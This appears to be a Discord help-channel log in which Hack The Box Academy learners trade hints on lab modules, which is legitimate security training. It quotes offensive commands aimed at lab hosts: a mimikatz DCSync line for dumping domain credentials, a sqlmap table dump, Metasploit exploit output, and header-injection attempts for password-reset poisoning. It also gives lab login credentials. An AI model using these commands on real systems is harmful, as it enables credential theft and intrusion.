rain mirage
#

Module = Footprinting smtp

Question :- Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

The things I have tried ... Checked if I can use the VRFY cmd , also tried to brute force the users with smtp-user-enum tool with the resource wordlist , now I'm planning to do wordlist mutation .. am I in the right track ?

rose zodiac
#

can someone help me with password attacks skill assessment, im on jump01 i tried looking for creds with snaffler i found a *.*3 file that i couldnt crack is there another way?

crimson leaf
frosty scarab
#

Can anyone offer a helping hand with the credential hunting in network shares, Im stuck, Thanks

river grove
rain mirage
fathom pendant
#

well smtp-user-enum has a way to adjust the wait time

rain mirage
#

So I'm on the right track ?

fathom pendant
#

yes

#

iirc it's -w

#

it's either -w -W one of them adjusts workers

rain mirage
junior fjord
#

Hey someone else also facing this kind of issue with HTB

It's my issue or something else

MY INTERNET IS PROPERLY WORKING
I AN NIT USING ANY PROXY
BUT STILL THIS NOT GETTING THE TARGET WEBSITE

junior fjord
#

Bu it's not needed and also not instructed above TARGET

#

It's a public facing target

cloud urchin
junior fjord
#

I think

rain mirage
junior fjord
cloud urchin
# junior fjord

probably something with your internet/network. does it work on your host pc?

junior fjord
cloud urchin
rain mirage
cloud urchin
junior fjord
#

Ok wait

junior fjord
#

No windows

rain mirage
rain mirage
junior fjord
#

Form past 1 week I am facing all public ips

#

It's wired

cloud urchin
junior fjord
#

But what problem here ?

cloud urchin
#

something with your routing/internet/network. maybe try ctrl+shift+r on the website.

junior fjord
#

Hmm 🧐

#

It opens (10 min after clicking)

cloud urchin
#

always best to include the module and section you're on

#

That is not the correct answer. "UNION" is not a type of SQL Injection. UNION is a SQL operator.

#

the operator does play a role but you also need to include the type

silent wolf
#

Is there a particular channel to have an admin look at a server that can not accessbile after spawning?

storm elk
#

That would be support

compact patrolBOT
storm elk
#

But make sure you’re connected to the vpn

silent wolf
#

I am connected. 🙂

storm elk
#

What module and what’s the issue? If it’s RDP and a black screen, try pressing enter

silent wolf
#

I have done several. This is on is not reachable. Restarted my box, target, etc. Sorry, I just realzed this is Academy, not Lab. I don't really see a channel for Labs.

storm elk
#

This’ll get you access to #boxes

silent wolf
#

tyvm!

storm elk
#

But tech support, is not on discord

compact patrolBOT
silent wolf
#

New to HTB platform. I figured it out. I did not realized you needed a different openvpn config file for LABS.

terse sedge
#

I am on Password Attacks - Attacking protected archives. I am unable to install dislocker. I have tried sudo apt-get install dislocker, and I get a bunch of failed to get, not found 54.39.128.230 80 errors. I have tried changing VPN regions, and tried disconnecting from the VPN. I tried installing it from github using git clone https://github.com/Aorimn/dislocker. No errors, it just doesn't install. Any idea?

pulsar needle
#

Which section is that?

terse sedge
#

Password Attacks - Attacking protected archives

pulsar needle
#

The Parrot OS one?

terse sedge
#

No, personal Kali VM.

pulsar needle
#

Turn off the VPN and then try apt get or apt install whatever it is.

#

Also what is this failed to get not found IP port? Can I see the screenshot?

terse sedge
#

I've tried that, and changing VPN regions.

pulsar needle
#

And it says failed to get , not found and then says an IP and Port?

#

Try to update and upgrade your Kali first.

terse sedge
pulsar needle
#

What is this IP you are showing Not Found not found? Are you on some kind of proxy or something?

#

Do this first
sudo apt update and then sudo apt upgrade

terse sedge
#

Those are not working either, getting: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5

fervent sonnet
#

anyone here who have experianced on CPTS from htb

vague cedar
#

could someone help me in password attack skills assessment

fervent sonnet
storm elk
#

About what?

fervent sonnet
#

what if i purchase VIP+ - $20/month then i can also access CPTS modules

storm elk
#

No

#

That’s the main platform. Academy is a different subscription and platform

fervent sonnet
#

okay

#

i understood

#

on months subscription i can access training paths for the certificates

#

onces i have completed then i can go for certificate exam

#

@storm elk am i right ?

acoustic owl
#

The monthly subscriptions give you a number of cubes, which you can then use to buy modules

storm elk
#

Month subscription will give you cubes. You can use those cubes to purchase modules. When you’ve finished a path, you can buy an exam voucher. An exam voucher is solely included with the yearly subscription.

#

With the monthly subscription, the exam voucher is to be purchased separately

fervent sonnet
#

talking about this
Exclusive Subscriptions
Student 👨‍🎓

For students and professors of universities and other academic institutions.

Price: $8/month (USD)

Access Based

Direct access to all modules up to (including) Tier II

    This includes the Bug Bounty Hunter, Penetration Tester, and SOC Analyst paths.

Unlimited Pwnbox usage

CPE credits submission

The Student Plan requires that you be a student or professor at an Educational or Academic Institution. This includes High School/Secondary School, University, Trade School, etc.

acoustic owl
#

Yes, this subscription gives you access to modules in the mentioned paths

fervent sonnet
spiral phoenix
#

Hello,
I have a question about the AD Enumeration & Attacks Module, Skills Assessment Part II.
I completed the assessment but didn't get one part.
Why doesn't the method used in Question 1 (to obtain user credentials) work on question 9 (obtain other user credentials). The method works if executed elsewhere for question 9, but not from the starting point (when doing question 1) even though both machines are on the same network...!?

fervent sonnet
#

which on is easier for beginner CBBH or CPTS ?

acoustic owl
#

I think CBBH is easier (not easy at all)

fervent sonnet
#

i dont have any email provided by academic institution

cloud urchin
fervent sonnet
#

but i am student

#

okay thanks

vague cedar
pulsar needle
# terse sedge Those are not working either, getting: `An error occurred during the signature v...
hollow kernel
#

Hi i have an error when i try to install openvas in vulnerabilty assesment module i updated and upgraded

pulsar needle
#

And what's the error say?

severe inlet
#

Hello guys for things like the LFI Module should i be testing for manual then automated or automated then manual?

pulsar needle
#

I don't think it matters which way around you do it.

fathom pendant
hollow kernel
#

Ah ok because openvas is in the path of cpts, and I have questions but i can't install

gusty ravine
#

Hey guys, first time talking. Could someone help me in telling what do people do when they get bored trying to study from HTB Academy? It's really good but it's just like I need a way to practice but I can't.

ancient blade
#

I"m working on the "Intro to evil twin attacks section", and under the EAPhammer automated attack, the entire written example does not match the lab. There are no boxes attached to "HTB-Wireless" but there are to HTB-Corp. All the notes say to attack HTB-Wireless, amy I missing something ?

simple onyx
# vague cedar anyone???

Hi, i have the same problem with Password attacks - skill assessment, im stuck as well at DMZ01, have spent about 3-4 hours trying to find priv esc factor, found the hw**** user creds at certain place, but they dont seem to be working anywhere. have set up chisel with proxychains, but cant seem to get nmap working correctly.
Is it possible for me to get a hint or a nudge towards specific direction, what may i have missed or what host should i focus on?

feral thicket
#

what modules can you recommend for level 1?

silent ivy
feral thicket
#

tier 1

silent ivy
#

I would just follow a path if you're new

ancient blade
feral thicket
silent ivy
silent ivy
ancient blade
feral thicket
#

I recently bought the book black hat python what do you think about it experienced guys?

silent ivy
feral thicket
#

oh sorry

zenith depot
#

hey sorry does bloodhound module really teaches the basic of bloodhound or the complete tutorial and advanced stuff ?

simple onyx
cloud urchin
vague cedar
simple onyx
velvet oasis
fathom pendant
fleet lark
#

Hey guys, I am currently working on Intrusion Detection With Splunk (Real-world Scenario). I have every question done except the third question. I am not sure if I am just overthinking it or what but I have been working on it for a few days and can't seem to get it. Not sure if anyone has an tips to help get me in the correct direction.

fathom pendant
#

@fair valve this isn't a hacker4hire server

muted hawk
elder hearth
#

Can anyone give us a hint on Q4 Skills Assessment for Bypassing WiFi Captive Portals.

quaint raft
#

Howdy folks, anyone available?

cloud urchin
#

don't ask to ask just ask

jolly oasis
#

Was anyone successful in using FinalRecon for Information Gathering - Web Edition > Skills Assessment?
My command looks like "./finalrecon.py --url http://<target ip>:<target port> --full" but the dump files are empty.

quaint raft
#

I am struggling with the Conditional Execution for the introduction to bash scripting. can anyone help me out? i'd very much appreciete it

#

I tried out so many codes and no matter what's the output i'd echo, it'd give me an incorrect message

waxen totem
quaint raft
rustic sage
#

Hi... Hope you are all doing well. I'm actually new here

#

Just wanna introduce myself

#

I'm in cyber security with experience of 1 year specifically in offensive security field

#

Right now I am learning about web pentesting pathway through tryhackme .. so which is the best option

#

Should I switch directly to hack the box or should I first learn deep about web pentesting doing portswigger labs

#

Also plz guide me which modules if hack the box are really best in offensive security

safe star
#

If your focus is web then I suggest doing the bug bounty hunter job path on academy

#

All of those resources will help in some capacity so if you want to complete the thm path first then move to htb and portswigger, that’s fine

safe star
quaint raft
#

Btw, thank you so much for your response @safe star @waxen totem 🙏🏽

cloud urchin
#

@rustic sage please take care not to post content from modules above tier 0

#

You simply state the module/section/question you're on, what problems you're running into, etc. Anyone who has done the module knows how to get the answer. And if you feel like you need to reveal a little more you can ask to take it to DM's.

rain mirage
# rain mirage Module = Footprinting smtp Question :- Enumerate the SMTP service even further ...

hey @fathom pendant i was doing this task ... after trying for couple of hrs i was not able to find the user , so i planned to use msf console instead and was able to find the flag in the first go .. so i just wanted to know how I was not able to get the flag in smtp_user_enum was there some flag i was missing ?
the command i used was : smpt_user_enum -M <mode> -U <user.txt> -t <ip>
and i also tried to mutate the resource file but still the result was same.

#

ANYONES HELP will be appreciated

rain mirage
#

Ya I forgot about that one ... U did suggest that yesterday too 🥲

coral steppe
#

Guys i need help

#

Can anyone help my by pwning a windows machine in HTB

#

I am a beginner

#

Please DM

wooden seal
coral steppe
#

Fluffy

#

I am a beginner

wooden seal
coral steppe
#

Wait

wooden seal
#

you will get access

coral steppe
#

Ok yes

#

I did it

coral steppe
coral steppe
icy egret
#

Hello guys, I am in
Attacking Active Directory and NTDS.dit chapter (Password attack module). Problem with third question.

I have used username-anarchy to create a username list which it worked. It gave me around 43 different username types.

I have an issue with Kerbrute. It is only using 21 of the names in the my generated list and no result. However I checked every single names in the list with kerbrute, still unsuccessful. Am i doing something wrong?

wooden seal
wooden seal
icy egret
#

it says those workers work with Inlanefreight, and i used inlanefreight.local? no?

meager phoenix
#

hi, i was working on the shells & payloads module skill assessment (the one w multiple targets). was wondering if there are ways to solve them without using the hints that provide the credentials? would it just be brute forcing or are there more deliberate ways?

steep forum
#

Does anyone have an explanation of why the map with a size of 0000000000003000 is interesting for the Attacking Thick Client Applications section?

faint hamlet
# steep forum Does anyone have an explanation of why the map with a size of 0000000000003000 i...

if you want to watch the whole walkthrough explained,
https://youtu.be/FbTxPz_GA4o?t=1500
It was part of retired windows insane box PivotAPI
Next section is the retired linux insane box Fatty

00:00 - Intro
01:00 - Start of nmap, downloading files over FTP
05:25 - The contents of all the PDF's don't really help. Using exiftool to extract authors.
08:20 - Using Kerbrute to bruteforce valid users and getting ASREP Hash. It is ETYPE 18, which hashcat doesn't support. Use downgrade to generate ETYPE 23 and crack the hash
11:15 - Going int...

▶ Play video
steep forum
#

Interesting for a medium difficulty module.

wooden seal
deep coral
#

guyz i am stucked here !!!
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01) with user "sam" and password "B@tm@n2022!"

  • 0 Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)
    this is from password attacks modue in submodule named spraying and stuffing and defaults
    can anyone give hint !!!
faint hamlet
deep coral
faint hamlet
#

so you can check default creds through CLI, that is not a requirement per say, you check defaults through google

brazen reef
#

Hi guys i’m new here, does anyone know anything about ip addresses etc that i can contact privately?

faint hamlet
#

delete this. as it is spoiling the module content

deep coral
#

thats what i did after this didnt runned on my ssh , so i just runned it on my attack maheiom

faint hamlet
#

and -ppasswd is the syntax

deep coral
#

hey thansk man !!

shell harbor
deep coral
# faint hamlet and -ppasswd is the syntax

i was just doing mistake there syntaxxxx i was using the space or like trying it again and again from mornign !! thanks a lot man !!! this minor mistakes happens a lot with me due to panic solving , thanks man !!

shell harbor
#

the space makes mysql think you are referencing a db or something

deep coral
shell harbor
#

yeah lmao its the little things

gusty mortar
#

Module: ABUSING HTTP MISCONFIGURATIONS   
Section: Password Reset Poisoning

I tried injecting all these header with interactsh.local:PORT value:
||Host
X-Forwarded-Host
X-Host
X-Original-Host
X-Forwarded-Server
Forwarded
X-Forwarded-For ||
and still in the /log page I dont see the reset token.

gusty mortar
#

And also this, I don't understand what's wrong with all the tasks in this module
Module: Abusing HTTP Misconfigurations
Section: Host Header Web Cache Poisoning

For the lab I have succesfully found which overwrite host header that is unkeyed and updates the url in login form to point to interactsh.local:port. I have verified with a bogus login try that log in requests are sent to interactsh. However the admin never seems to try login so a request with the password is never sent.

mint pelican
#

Can anyone help me with password attack skill assessement? I got access to jump01 and searched the shares got .psafe file and one hash from the .xml file and also got a clear text password from the .xml file. But don't know what to do now i am lost.

vagrant turret
#

Hey, were you able to solve the issue? Facing the same problem, don't know what to do with it

ivory flame
#

Hey guys, im currently doing Shells & Payloads Module in Infiltrating Unix/Linux section. And I encountered this problem

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
[*] Started reverse TCP handler on xx.xx.xx.xx:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 3.9.6 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Linux__Http__Rconfig_vendors_auth_file_upload_rce::MetasploitModule::RHOST
[*] Exploit completed, but no session was created.

Has anyone solved this issue?

wooden seal
ivory flame
#

okay, i'll try

#
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOST 10.129.201.101
RHOST => 10.129.201.101
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
[*] Started reverse TCP handler on xx.xx.xx.xx:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. Can't access the rConfig web interface ! ForceExploit is enabled, proceeding with exploitation.
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Linux__Http__Rconfig_vendors_auth_file_upload_rce::MetasploitModule::RHOST
[*] Exploit completed, but no session was created.

Still doesn't work

deft sphinx
worthy mauve
#

For the Password Attacks module in the Credential Hunting in Windows section

worthy mauve
#

Yes

#

And trying to compile the python file

wooden seal
worthy mauve
#

Python file*

wooden seal
#

show your terminal ss what you exactly doing

worthy mauve
#

with pyinstaller or nuitka

wooden seal
#

coz i always use lazagne.exe and it works like charm

wooden seal
mint pelican
jolly swift
worthy mauve
ivory flame
#

but it keeps forcing me to add RHOST

#

after I added RHOST it still wont work

jolly swift
lavish marten
ivory flame
copper jay
#

hey, im having a lab environment for my school on my own device set up with this information:

192.168.30.21: Open ports & Services & Operating System Information
OS Details: Microsoft Windows Server 2022
Hostname: DC01

  • 53 (Domain Simple DNS Plus)
  • 88 (Microsoft Windows Kerberos)
  • 135 (Microsoft Windows RPC)
  • 139 (Microsoft Windows NetBIOS-ssn
  • 389 (Microsoft Windows Active Directory LDAP Domain: dsmit.local, site: defaut-first-site-name)
  • 445 (Microsft DS wat gebruikelijk een Netwerk share is)
  • 464 (kpasswd)
  • 593 (Microsoft Windows RPC HTTP 1.0)
  • 636 (tcp wrapped)
  • 3268 (Microsoft Windows Active Directory LDAP Domain: dsmit.local, site: defaut-first-site-name)
  • 3269 (tcpwrapped)
  • 5357 (Microsoft HTTPAPI httpd 2.0)
  • 3985 (Microsoft HTTPAPI httpd 2.0)

192.168.30.22: Open ports & Services & Operating System Information
OS Details: Linux 4.15 – 5.19

  • 22 (OpenSSH 9.6 Ubuntu Linux Protocol 2.0)
  • 80 (nginx 1.24.0)
  • 8080 (Jetty 10.0.18

192.168.30.128: Open ports & Services & Operating System Information
OS Details: Windows 11 21h2

  • 135 (Microsoft Windows RPC)
  • 139 (Microsoft Windows NetBIOS-ssn)
  • 445 (Microsoft DS)

the goal is a root shell (i already have that) but i also need a domain admin account, anyone has any idea how i could procceed, smb somehow doesnt work with everything ive tried

supple dragon
balmy wigeon
jolly swift
alpine estuary
#

cant connect to the rdp on "Pass the Ticket (PtT) from Windows" - Password attacks. Do I just try again later or?

acoustic owl
dapper moth
lavish marten
#

Thanks!

soft moon
#

hello again i've returned hahahaha
in the module of the URL, I just need to confirm that I am doing it correctly for the last question everything seems ok its just the web page doesnt load on my device of the server with the octet of 135
and no it should work because I can curl the http page and grab the flag there, but I would like to know why though? as I've teaming up with someone else while doing the same module but he couldnt get the web page to curl but view the HTTP page in web browser...

also learnt some spooky stuff about ARP on this module reforcing my knowledge on networking 😄
https://academy.hackthebox.com/module/158/section/1434

alpine estuary
crisp root
#

bro i need help

#

i need someone who knows how to hack to help me get my account back

soft moon
#

cant help you with that also run before the admins come and get you banned

acoustic owl
#

ie google, Instagram, etc

rose zodiac
spark cobalt
# crisp root bro i need help

That is not what this discord is for, and if you lost your account, its best to talk to the site and communicate it with them. As it is illegal for anyone to "help" you get it back. bare in mind there are lots of scams out there who'll offer to help you and are just stealing your money.

golden sparrow
#

Hey people..this is someone who is starting with cybersecurity .. I am currently enrolled in a computer - science engineering course in my university.. Just completed the Intro to Academy module and begun with Learning process

fallow kettle
#

heya, I am doing the "web requests - http headers" exercise and I need to find the flag in the devtools of the browser, I found the flag but it does not work

#

seems to be a bug.

#

nvm, the request had to be opened, a bit misleading lol especially with the hint " Hint

Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests. "
😄

keen onyx
#

Does anyone have any tips for the Password Attacks Skills Assessment? I have ssh access to DMZ01 and found credentials for another user in FILE01. Now I need to pivot via DMZ01, and although I've tried proxychains and chisel, nothing seems to be working. The proxy itself seems to be working, but I can't reach FILE01 through it - I've tried nmap scans as well as requests to common services but I usually get a timeout error or an immediate error. I can't even ping FILE01 from DMZ01 even though they should be in the same subnet. Am I doing something wrong, or could this be an issue with the environment?

abstract ingot
#

is there anyone doing Skills Assessment - Password Attacks?

abstract ingot
#

that module is so hard

tidal lintel
#

Hey guys, anyone around for sanity check on Android Fundamentals ?

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I made the device, but my answer is never correct, I don't think my build number is wrong. Any help would be appreciated

keen onyx
hexed lagoon
#

Hi all, in stuck on the module "Broken authentication" in the section Brute-forcing Password.
In the task the second question say what is a pwd of admin user, i tried with login bruteforce and i used grep for filter pwd as indicated in the policy, i tried to brute force the token param via GET and POST but nothing.
Any hint for this?
Greetings

sacred rock
#

@tidal lintel send me your answer via dm

rose zodiac
#

hey im really stuck on Passwords attack credential hunting in network shares the second question i would really appreciate some help

rose zodiac
sacred rock
rustic sage
#

Hi

hexed lagoon
sacred rock
hexed lagoon
sacred rock
#

Or maybe you are fuzzing wrong, that is a possibility too

hexed lagoon
hexed lagoon
#

In two different bruteforce with ffuf

#

But the scope is not the token if rhe question request the password for the admin user, right?

sacred rock
#

Yeah, don't need to interact with anything token related for this question, you just need the correct password

jolly oasis
#

Good morning all. I'm still stuck on Information Gathering - Web Edition > Skills Assessment > Questions 3-5.
I've tried using dnsenum (errors out with "NS record query failed: NXDOMAIN") and ReconSpider. Neither get any results. I don't want to include too many details and get in trouble.
Forgot to add - /etc/hosts has been updated with the lab info.

sacred rock
#

You forgot to check for something important, starts with V, you need more recon.

icy ravine
#

Hi there! Sorry if I’m writing in the wrong section, I really enjoy using HTB Academy; it’s been a fantastic learning resource.
I’ve noticed that some modules (even those that require quite a bit of research and time) award 0 cubes when completed. Is there a particular reason for this?I feel that even a small cube reward for these modules would help motivate learners and acknowledge their effort. Still great content. thanks for your time.

sacred rock
merry stone
#

Hi, I am doing SQLMap Essentials module Attack Tuning section, i ran the command ||sqlmap -u "http://targeet.com/case5.php?id=1" --dump --level=5 -T flag5 -C id,content --risk=3 --batch -T flag5||
from my machine and it gave me a wrong flag, then i ran the exact same command on the pwn box and it gave me the valid flag
can someone explain?

jolly oasis
rose zodiac
sacred rock
sacred rock
jolly oasis
sacred rock
rose zodiac
sacred rock
rose zodiac
#

like what 🙂

sacred rock
#

What account are you looking for?

opaque tangle
#

Hi

rose zodiac
faint geode
#

@rustic sage make sure there's no spaces at the end of your copy paste

#

What module and section ?

viral badger
#

Bloodhound - Nodes (no results from the .zip pointing to this question)

quaint raft
#

Question + excersice code:

#

I tried out this one, didn't work for me

fathom pendant
#

you need to exit the loop after 35 run throughs.

#

then after that you need to count the characters, in this case i believe they don't want you to get rid of the new-line (\n) in the count

quaint raft
real tapir
quaint raft
#

also do i have to modifiy the excersice code or do i add a new loop?

fathom pendant
quaint raft
fathom pendant
quaint raft
#

Gotcha

keen onyx
fathom pendant
snow spoke
snow spoke
marsh vessel
#

hello question i am in the intro to hashcat > password cracking > use mask attack
should i just try and change the mask or what i should do ?

fathom pendant
#

the mask should be given to you, i don't think modification is required

marsh vessel
#

it worked my bad Sad_Squidward_Pepe

vast wind
#

Hey guys I am stuck on module/77/section/851 the knowledge check in the Getting started Module. I am having trouble figuring out how to find the full url for the next part with gobuster. I am able to visit the ip in the website but I am not sure how to progress further. I used whatweb but I am not sure what url to use gobuster on. Any tips are welcome, thanks!

fathom pendant
silent ivy
vast wind
#

okay. so i dont have to use http:// xx.xxx.xx.xxx/ nibbleblog . I dont have to include the nibbleblog part but for the get simple box?

#

Just the ip?

fathom pendant
silent ivy
vast wind
#

Thanks, guys. I'm relatively new to Cybersecurity, but I'm determined to make it through this course. 👍

cloud urchin
#

@rose cloak Sorry, this server is dedicated for discussion of the various HTB platforms. We don't allow political discussion, especially in this channel. Please read the #rules.

thorny karma
#

hey im having problems with the first question in the DCSync section in te AD module, i rdp'd into the MS01 host, first couldn't find secretdump in the tools directory tried to use mimikatz but it says access denied

lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

i also tried to runas adunn, when i look at the hostname it says htb-student

fathom pendant
#

did you privilege::debug?

thorny karma
#

yes

thorny karma
# fathom pendant did you privilege::debug?

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

rustic sage
#

Isn't possible to reset modules and do all the shii again, without the answers?

hollow kernel
#

Hi i have a problem with the vpn i Lost the conextion with free rdp to the target

hollow kernel
#

I don't know why

rustic sage
#

aight

fathom pendant
thorny karma
#

where can i find secretdump within MS01

rustic sage
#

dat would be cool anyway, without giving any points of course

steep forum
steep forum
spiral cove
barren crystal
#

with student do you keep access to 100% finished modules if they get updated in the future?

steep forum
cloud urchin
vast wind
#

Should we use AI to assist us when doing hack the box?

cloud urchin
#

It's a tool like anything else. "Should" makes it a bad question.

vast wind
#

Hmm agreed, it makes sense to leverage whatever we can to protect or penetrate a system.

steep forum
#

HackTheBox is meant for learning. If you actually want to learn... I wouldn't recommend it.

silent ivy
cloud urchin
#

probably a better discussion for #ai-ml-llms, @vast wind you'll need to follow the instructions in #welcome to gain access.

karmic snow
#

Why was my answer not accepted for the 8th question in the guidance mode of the retired machine Retro: What is the error code returned when authenticating as the machine account with the default password?BANKING$? My answer was: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT.

storm elk
#

If you can’t access it, read and follow instructions of #welcome

frosty crescent
#

I'm having a hard time understanding why I would use RPIVOT instead of sshuttle or ligolo or whatever

#

Doing the pivoting module of the CPTS path

cloud urchin
frosty crescent
#

For sure, but is there a use case that only RPIVOT could do?

cloud urchin
#

idk, probably

twilit barn
#

I’m sorry but do anyone can get me to contact the customer support of htb?

compact patrolBOT
spiral cove
river grove
#

Hey guys, Would appreciate a nudge on Introduction to NoSQL Injection skills assessment 2

spiral cove
severe jewel
#

I’m stuck I need answers for snort fundamentals

compact apex
#

Hi guys, currently stuck in the Password attack module section Pass the certificate I am unable to answer the two questions What are the contents of flag.txt on jpinkman's desktop? and What are the contents of flag.txt on Administrator's desktop? . I tried using pywhisker to create jpinkman.ccache but then we I try to connect using evil-winrm

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information                                                     
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'

Any idea ?

#

Looks like a lot of people are struggling with this one since the update of the module is the lab not broken ?

smoky veldt
#

I need help

#

Can anyone leak the IP address of two numbers I will give

compact apex
#

nevermind I got my answer this is stupid case sensitive

tall imp
#

People, I want to increase the security of my wifi, do you recommend a video on youtube where I explain how to better protect the wifi network, or a pdf document or website where I explain it in detail?

full patio
wide drum
#

Hey can some one help me with the Information Gathering- Web edition, at the WayBack machine task, the way back machine don't have the exact dates anymore, i guess it's been from that brigde

#

And i can't see the snapshots to complete my task

#

"How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234."

crimson leaf
#

@wide drum Wayback definitely has the date in question. What domain name are you using?

full patio
#

Using XXEInjector for OOB XXE in this module: https://academy.hackthebox.com/module/134/section/1207

The module says:

We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the Logs folder under the tool, and we can find our file there:

But I can't find the logs folder or any mention of it anywhere. Any ideas?

wide drum
#

it's about the date on the wayback machine

#

it has the date, but when you click, it gives you 302 error

crimson leaf
wide drum
crimson leaf
#

Yeah it should work, I am looking at the page as we speak

wide drum
#

a ok

#

when i was waiting at the redirecting

#

it freezed

#

but now it's ok

#

thx

opal ember
#

Hello guys, I'm doing Skills Assessment - Password Attacks
I got access to jump01 as bd___, but I didn't find anything useful in the pcap's files. Can someone give me a hint?

rose zodiac
#

check your privileges

opal ember
acoustic owl
#

@rustic sage Please read #rules

void swift
#

Hey guys
I'm working on the Redeemer machine in Starting Point and hitting a wall with Nmap.
I've tried a full port scan -p- with -Pn and aggressive timing ,-T4, even with --min-rate. My Nmap results consistently show all 65535 TCP ports as filtered,no-response.
I've confirmed my VPN is up and running.
Am I missing something fundamental here, or is there a different recon approach I should be considering for this specific machine, given the all-filtered Nmap output? Any subtle nudges or general advice would be super helpful without outright spoilers! Thanks!

rustic sage
#

Sorry... but for knowledge!

crimson leaf
void swift
#

when i try doing a basic scan it says the host is down

crimson leaf
#

Found this note on a write up to see what you should be seeing

P.S.
Sometimes this machine can be extremely buggy or slow. So if nmap scans are not yielding anything even when scanning over all ports with multiple techniques, then the machine probably needs maintenance. ```
void swift
crimson leaf
void swift
#

alright ill go do that, thanks!

#

I forgot to mention I'm using a kali linux VM
that wouldn't be the issue would it?

crimson leaf
#

No, kali is fine, all that matters is that you are appropriately connected to the VPN

#

If you have pwnbox access that can be useful for debugging connection issues, but not required for anything

void swift
#

i wasted my pwnbox hours on this machine itself lol

#

thats why i had to switch over to a vm

upper wraith
#

Hello everyone, i want to learn cybersecurity especially the offenssive one. Can u tell me the best roadmap? Please DM me 🙏🙏

reef sonnet
#

stuck a bit on module "Attacking Common Applications" in "attacking gitlab" section.
what wordlist is the most efficient to find another valid user in gitlab?
xato with 10 mil usernames does not seem to be helpful

gloomy stump
#

Hi I'm doing Analyzing Evil With Sysmon & Event Logs from Windows Event Logs & Finding Evil I'm trying to move the calc.exe with move "C:\Windows\System32\calc.exe" "C:\Users\Administrator\Desktop\calc.exe" but it says access denied but why? I run the command prompt as administrator, can someone help me?

pastel wasp
#

Can anyone give me a hnit for Artificial box root escalation. Already got the user.txt.

safe token
#

hey. so got an issue with a module - macOS fundemantals: Graphical User Interface. at the bottom the question seemingly wants me to give a number macOS version but there is no macOS anywhere. my VM is still a parott. what do i miss?

#

like checking the OS version shouldnt be hard but i simply cant find where could i run a macOS

#

aaa ok nevermind. disclaimer says that it requires access to macOS. sry

gloomy stump
#

oh got it 😮

river epoch
#

Do I need any prerequisites to start the Bug Bounty Hunter Path?
I finished the Cyber 101 path and planning to finish the Jr Pen Tester path in TryHackMe.

full patio
#

Guys, I'm stuck on Web Attacks - Skills Assessment https://academy.hackthebox.com/module/134/section/1219

Specifically, escalating privs to begin with.

  • I've found the token I think I need of user ||52||
  • I have the correct request format (I think), because I'm getting 'Access Denied'
  • The parameters I'm using are: ||uid, token and password||

||`POST /reset.php/52 HTTP/1.1
Cookie: PHPSESSID=jgd6sekugjgdm4gqnbff0ja48a; uid=52
Content-Type: application/x-www-form-urlencoded

uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=NewPass123!`||

I just can't seem to get this users password changed.
Any hints or help please! 😭

full patio
river epoch
#

Thanks

cedar void
#

If you want to view the "Table of Contents" on the right side of the web page of the module you are looking at, what commands do I press to change the view formating for the Table of contents

cedar void
thick socket
#

can someone help? can't connect via SSH. openvpn connection is estabilished, tried to connect diff server via SSH and everything fine, but not to the HTB server

#

what am i doing wrong

crimson leaf
crimson leaf
# thick socket

That looks fine, may be worth terminating and re-starting the box. Occasionally services don't spawn properly

knotty anvil
# thick socket

does it say initialization sequence completed at the bottom?
do you have tun0 interface
can you pping the ip

thick socket
#

ye wait a sec

knotty anvil
#

sometimes it bugs when you have 2 vpns running at the same time

#

what does ip a show

thick socket
knotty anvil
#

are u sure ssh running on port 22 on that box?

thick socket
#

there are no information which port i should use

knotty anvil
#

hmmm

#

i have no idea it looks good

crimson leaf
#

Best guess is that SSH never came up. Could do an nmap of that port to check

knotty anvil
#

^

thick socket
#

also when i ping ip machine i have 100% packet loss

slate zinc
#

bruh

#

the ip is

thick socket
#

yes, exactly this

slate zinc
#

can u try to ping this one?

#

i would do
sudo killall openvpn and connect again

#

altho cant say what the issue is directly but this is a step

thick socket
#
PING 10.129.45.153 (10.129.45.153) 56(84) bytes of data.
^C
--- 10.129.45.153 ping statistics ---
9 packets transmitted, 0 received, 100% packet loss, time 8211ms
crimson leaf
#

Now I am wrapping back around with thinking you are on the wrong vpn big_think

